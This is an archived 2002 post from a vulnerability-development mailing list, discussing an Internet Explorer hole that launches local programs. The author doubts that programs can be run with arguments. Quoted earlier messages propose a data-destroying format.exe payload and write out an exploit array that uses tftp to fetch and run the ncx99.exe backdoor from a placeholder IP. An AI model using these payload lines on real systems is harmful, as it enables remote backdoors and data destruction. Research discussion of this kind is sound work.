Vulnerability Development mailing list archives
Re: Rather large MSIE-hole
From: methodic <methodic () slartibartfast angrypacket com>
Date: Thu, 14 Mar 2002 00:39:58 -0800
Im not sure who else has looked at this, but I dont believe its possible to run programs with arguments using this vuln. On 03.13.02, NoCoNFLiC <nocon () castleblack darkflame net> wrote:
[nyquist () ntlworld com] Wed, Mar 13, 2002 at 08:45:46AM +0000 wrote:If this is confirmed, could this array by changed to equal, erm...let's say format.exe (with a couple of parameters to silently format C:/)? var programName=new Array( 'c:/windows/system32/logoff.exe', 'c:/winxp/system32/logoff.exe', 'c:/winnt/system32/logoff.exe'I havent tried, since i don't run MS, how about ? var programName=new Array( 'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe', 'c:/winnt/system32/ncx99.exe', ); - nocon
-- + methodic >> [http://methodic.angrypacket.com] -- - + Cannot find nsabackdoor.dll. Please reinstall Windows.
Current thread:
- Rather large MSIE-hole Magnus Bodin (Mar 12)
- Re: Rather large MSIE-hole Jon Zobrist (Mar 12)
- Disabling the MSIE hole. Suresh P (Mar 12)
- Re: Disabling the MSIE hole. Bob at firstcodings (Mar 13)
- RE: Disabling the MSIE hole. leon (Mar 13)
- Re: Disabling the MSIE hole. Magnus Bodin (Mar 13)
- Re: Rather large MSIE-hole Magnus Bodin (Mar 12)
- Re: Rather large MSIE-hole NyQuist (Mar 13)
- Re: Rather large MSIE-hole NoCoNFLiC (Mar 13)
- Re: Rather large MSIE-hole methodic (Mar 14)
- Re: Rather large MSIE-hole Felipe Franciosi (Mar 14)
- Re: Rather large MSIE-hole KF (Mar 14)
- Re: Rather large MSIE-hole jon schatz (Mar 14)
- Re: Rather large MSIE-hole NoCoNFLiC (Mar 15)
- Re: Rather large MSIE-hole NyQuist (Mar 13)
- Re: [Re: Rather large MSIE-hole] another variant (NAV and Finjan block this) David Barnett (Mar 16)
- <Possible follow-ups>
- Re: Rather large MSIE-hole foo BAR (Mar 12)
- RE: Rather large MSIE-hole Jim Harrison (SPG) (Mar 13)
- Re: Rather large MSIE-hole Raul Dias (Mar 13)
- RE: Rather large MSIE-hole Maarten Oosterink (Mar 14)